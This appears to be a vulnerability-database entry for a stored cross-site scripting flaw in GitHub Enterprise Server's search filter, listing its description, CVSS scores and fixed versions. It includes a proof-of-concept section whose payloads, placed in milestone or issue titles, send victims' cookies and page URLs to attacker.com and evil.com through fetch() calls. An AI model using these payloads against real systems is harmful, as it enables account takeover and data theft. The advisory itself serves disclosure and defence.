Security Vulnerability Report
CVE-2025-13744 CVSS 5.4 MEDIUM

CVE-2025-13744

Published: 2026-01-06 21:15:42
Last Modified: 2026-01-30 16:51:11

Description

An Improper Neutralization of Input During Web Page Generation vulnerability was identified in GitHub Enterprise Server that allowed attacker-controlled HTML to be rendered by the Filter component (search) across GitHub, which could be used to exfiltrate sensitive information. An attacker would require permissions to create or modify the names of milestones, issues, pull requests, or similar entities that are rendered in the vulnerable filter/search components. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.20 and was fixed in versions 3.19.1, 3.18.2, 3.17.8, 3.16.11, 3.15.15, and 3.14.20. This vulnerability was reported via the GitHub Bug Bounty program.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* - VULNERABLE (in each of the version ranges listed below)
GitHub Enterprise Server < 3.14.20
GitHub Enterprise Server < 3.15.15
GitHub Enterprise Server < 3.16.11
GitHub Enterprise Server < 3.17.8
GitHub Enterprise Server < 3.18.2
GitHub Enterprise Server < 3.19.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// CVE-2025-13744 PoC - Stored XSS in GitHub Enterprise Server Filter Component
// Steps to reproduce:
// 1. Create a malicious milestone with XSS payload in name
//    POST /repos/{owner}/{repo}/milestones
//    {
//      "title": "<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>",
//      "description": "Malicious milestone"
//    }
// 2. Alternative payload using script tag
//    "title": "<script>fetch('https://evil.com?data='+btoa(document.cookie))</script>"
// 3. When victim searches or uses filter, XSS executes
//    The malicious script sends cookies to attacker-controlled server

// Example JavaScript payload for exfiltration:
const xssPayload = `
<img src=x onerror="
  fetch('https://attacker.com/log?c=' + encodeURIComponent(document.cookie) +
        '&u=' + encodeURIComponent(window.location.href))
">
`;

// This payload can be placed in:
// - Milestone names
// - Issue titles
// - Pull request titles
// - Labels
// - Any entity rendered in filter/search components

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13744", "sourceIdentifier": "[email protected]", "published": "2026-01-06T21:15:41.933", "lastModified": "2026-01-30T16:51:10.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Input During Web Page Generation vulnerability was identified in GitHub Enterprise Server that allowed attacker controlled HTML to be rendered by the Filter component (search) across GitHub that could be used to exfiltrate sensitive information. An attacker would require permissions to create or modify the names of milestones, issues, pull requests, or similar entities that are rendered in the vulnerable filter/search components. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.20 and was fixed in versions 3.19.1, and 3.18.2, 3.17.8, 3.16.11, 3.15.15, and 3.14.20. This vulnerability was reported via the GitHub Bug Bounty program."}, {"lang": "es", "value": "Una vulnerabilidad de neutralización incorrecta de entrada durante la generación de páginas web fue identificada en GitHub Enterprise Server que permitía que HTML controlado por el atacante fuera renderizado por el componente de filtro (búsqueda) en todo GitHub y que podría ser utilizado para exfiltrar información sensible. Un atacante requeriría permisos para crear o modificar los nombres de hitos, incidencias, solicitudes de extracción (pull requests), o entidades similares que se renderizan en los componentes de filtro/búsqueda vulnerables. Esta vulnerabilidad afectó a todas las versiones de GitHub Enterprise Server anteriores a la 3.20 y fue corregida en las versiones 3.19.1, y 3.18.2, 3.17.8, 3.16.11, 3.15.15, y 3.14.20. 
Esta vulnerabilidad fue reportada a través del programa GitHub Bug Bounty."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": 
"LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.14.0", "versionEndExcluding": "3.14.20", "matchCriteriaId": "43EB11CA-6023-4B6E-824F-BC1E3B38BBC8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.15.0", "versionEndExcluding": "3.15.15", "matchCriteriaId": "6F3CBE73-32C5-4F1A-A660-3016FA77E633"}, {"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.16.0", "versionEndExcluding": "3.16.11", "matchCriteriaId": "754773B0-BDEC-497C-91A7-F542A74C4414"}, {"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.17.0", "versionEndExcluding": "3.17.8", "matchCriteriaId": "5C3E38F9-7310-4901-90A8-C0BEAFA8A092"}, {"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncludin ... (truncated)